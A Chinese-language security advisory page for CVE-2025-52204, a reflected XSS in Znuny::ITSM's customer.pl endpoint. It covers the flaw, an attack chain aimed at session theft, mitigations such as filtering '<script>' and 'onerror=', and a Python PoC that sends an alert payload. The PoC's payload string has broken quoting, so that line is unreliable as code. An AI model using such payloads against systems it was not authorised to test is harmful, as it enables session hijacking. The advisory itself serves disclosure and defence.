CVE-2025-52204 CVSS 6.1 中危

CVE-2025-52204 Znuny::ITSM customer.pl接口XSS漏洞

披露日期: 2026-03-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-52204

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Znuny::ITSM

漏洞概述

Znuny::ITSM 6.5.x版本中的customer.pl端点存在跨站脚本（XSS）漏洞。攻击者可通过OTRSCustomerInterface参数注入恶意脚本。由于无需认证且利用难度低，远程攻击者可诱导受害者点击特制链接，从而在受害者浏览器中执行恶意代码，窃取会话凭证或进行重定向操作，对数据的机密性和完整性构成威胁。

技术细节

该漏洞源于Znuny::ITSM在处理customer.pl端点请求时，未能对OTRSCustomerInterface参数实施严格的输入验证和输出编码。攻击者可以构造包含恶意JavaScript代码的特制URL（例如利用`<script>`或`<img onerror>`标签）。当受害者访问此链接时，应用程序会将未经净化的参数值直接反射回HTML响应中，导致浏览器解析并执行攻击者的脚本。由于CVSS向量包含S:C（Scope Changed），该脚本执行可能突破当前上下文，影响同一浏览器下的其他会话。攻击者可利用此漏洞窃取管理员的Session ID、进行钓鱼攻击或执行未授权操作，严重威胁系统的机密性和完整性。尽管需要用户交互（UI:R），但在社会工程学辅助下，该漏洞极易被利用。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用Znuny::ITSM 6.5.x版本，并确认customer.pl端点可访问。

STEP 2

制作利用代码

攻击者构造包含恶意JavaScript代码的URL，将payload注入到OTRSCustomerInterface参数中。

STEP 3

传递攻击载荷

通过钓鱼邮件或即时通讯工具，将特制的恶意链接发送给目标受害者。

STEP 4

执行攻击

受害者点击链接，服务器收到请求并将未过滤的参数反射回页面，浏览器解析并执行恶意脚本。

STEP 5

达成目标

恶意脚本窃取受害者的Cookie或Session ID，攻击者利用这些凭证劫持用户会话。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-ip/znuny/customer.pl"

# Malicious payload to test XSS
# Payload attempts to execute a simple JavaScript alert
payload = ""><script>alert('CVE-2025-52204_XSS');</script>"

# Parameters to exploit the vulnerability in OTRSCustomerInterface
params = {
    "OTRSCustomerInterface": payload,
    "Action": "CustomerTicketMessage"  # Example action, may vary based on configuration
}

try:
    # Send GET request
    response = requests.get(target_url, params=params, timeout=10)

    # Check if the payload is reflected in the response without encoding
    if payload in response.text:
        print("[+] Vulnerability Confirmed: The payload was reflected in the response.")
        print("[+] Check the browser window for the alert popup if manually opened.")
    else:
        print("[-] Vulnerability not detected or payload was encoded.")

except Exception as e:
    print(f"Error: {e}")

影响范围

Znuny::ITSM 6.5.x

Znuny < 7.3.1

防御指南

临时缓解措施

建议管理员暂时禁用受影响的customer.pl接口功能，或通过反向代理层（如Nginx）对OTRSCustomerInterface参数进行正则匹配和过滤，拦截包含`<script>`, `javascript:`, `onerror=`等恶意字符的请求。同时，应加强对用户的钓鱼防范意识培训，避免点击不明链接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-52204
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-52204
3 Details https://www.cvedetails.com/cve/CVE-2025-52204/
4 VulDB https://vuldb.com/cve/CVE-2025-52204
5 Link http://znuny.com
6 Link http://znunyitsm.com
7 Link https://github.com/j0qq3r/CVE-2025-52204
8 Link https://www.znuny.org/en/releases/znuny-7-3-1
9 Link https://github.com/j0qq3r/CVE-2025-52204

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表